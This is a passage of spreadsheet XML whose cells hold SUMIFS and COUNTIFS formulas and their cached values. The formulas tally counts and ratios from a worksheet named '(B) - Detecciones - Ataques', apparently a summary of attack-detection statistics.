        <v>23</v>
      </c>
      <c r="CQ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>21</v>
      </c>
      <c r="CT56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>32</v>
      </c>
      <c r="CZ56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI56" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ56" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BJ3:$BJ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>1</v>
      </c>
      <c r="DK56" s="271"/>
      <c r="DO56" s="279"/>
      <c r="DP56" s="271"/>
      <c r="DQ56" s="271"/>
      <c r="DR56" s="271"/>
      <c r="DS56" s="271"/>
      <c r="DT56" s="271"/>
      <c r="DU56" s="271"/>
      <c r="DV56" s="271"/>
      <c r="DW56" s="271"/>
      <c r="DX56" s="271"/>
      <c r="DY56" s="271"/>
      <c r="DZ56" s="271"/>
      <c r="EA56" s="271"/>
      <c r="EB56" s="271"/>
      <c r="EC56" s="271"/>
      <c r="ED56" s="280"/>
      <c r="EG56" s="279"/>
      <c r="EH56" s="271"/>
      <c r="EI56" s="358" t="s">
        <v>1373</v>
      </c>
      <c r="EJ56" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S33 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="EK56" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S33 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EL56" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S33 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="EM56" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S33 &amp; "*")</f>
        <v>9</v>
      </c>
      <c r="EN56" s="360">
        <f t="shared" si="37"/>
        <v>9</v>
      </c>
      <c r="EO56" s="364"/>
      <c r="EP56" s="456">
        <f t="shared" si="40"/>
        <v>0.1011235955</v>
      </c>
      <c r="EQ56" s="457">
        <f t="shared" si="41"/>
        <v>0.8988764045</v>
      </c>
      <c r="ER56" s="427">
        <f t="shared" si="42"/>
        <v>0.7407407407</v>
      </c>
      <c r="ES56" s="427">
        <f t="shared" si="43"/>
        <v>0.75</v>
      </c>
      <c r="ET56" s="427">
        <f t="shared" si="48"/>
        <v>0.7777777778</v>
      </c>
      <c r="EU56" s="271"/>
      <c r="EV56" s="358" t="s">
        <v>427</v>
      </c>
      <c r="EW56" s="465">
        <f t="shared" ref="EW56:EZ56" si="50">IF(EJ34=0,"-",EJ55/EJ34)</f>
        <v>0</v>
      </c>
      <c r="EX56" s="465">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="EY56" s="465">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="EZ56" s="466">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="FA56" s="280"/>
      <c r="FK56" s="445"/>
      <c r="FL56" s="359"/>
      <c r="FM56" s="359"/>
      <c r="FN56" s="359"/>
      <c r="FO56" s="359"/>
      <c r="FP56" s="359"/>
      <c r="FY56" s="379" t="s">
        <v>209</v>
      </c>
      <c r="FZ56" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA56" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GC56" s="379" t="s">
        <v>209</v>
      </c>
      <c r="GD56" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*"))</f>
        <v>0.2051282051</v>
      </c>
      <c r="GE56" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*"))</f>
        <v>0.3076923077</v>
      </c>
    </row>
    <row r="57">
      <c r="C57" s="472" t="s">
        <v>2530</v>
      </c>
      <c r="J57" s="277"/>
      <c r="K57" s="352" t="s">
        <v>2531</v>
      </c>
      <c r="L57" s="403" t="s">
        <v>2532</v>
      </c>
      <c r="M57" s="403" t="s">
        <v>2533</v>
      </c>
      <c r="N57" s="404" t="s">
        <v>2534</v>
      </c>
      <c r="O57" s="278"/>
      <c r="Q57" s="271"/>
      <c r="R57" s="352" t="s">
        <v>2523</v>
      </c>
      <c r="S57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>3701</v>
      </c>
      <c r="T57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>3177</v>
      </c>
      <c r="U57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>127</v>
      </c>
      <c r="V57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>40</v>
      </c>
      <c r="W57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>13</v>
      </c>
      <c r="X57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>415</v>
      </c>
      <c r="Z57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>159488</v>
      </c>
      <c r="AA57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>37</v>
      </c>
      <c r="AB57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>202</v>
      </c>
      <c r="AC57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>51</v>
      </c>
      <c r="AD57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>812</v>
      </c>
      <c r="AE57" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>43</v>
      </c>
      <c r="AF57" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6005</v>
      </c>
      <c r="AG57" s="271"/>
      <c r="AH57" s="352" t="s">
        <v>2523</v>
      </c>
      <c r="AI57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>3695</v>
      </c>
      <c r="AJ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>6</v>
      </c>
      <c r="AL57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>3177</v>
      </c>
      <c r="AN57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>108</v>
      </c>
      <c r="AR57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>5</v>
      </c>
      <c r="AS57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>7</v>
      </c>
      <c r="AV57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>26</v>
      </c>
      <c r="AY57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>13</v>
      </c>
      <c r="BB57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>396</v>
      </c>
      <c r="BI57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>19</v>
      </c>
      <c r="BL57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>150335</v>
      </c>
      <c r="BN57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>9152</v>
      </c>
      <c r="BO57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ57" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CX3:$CX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR57" s="355">
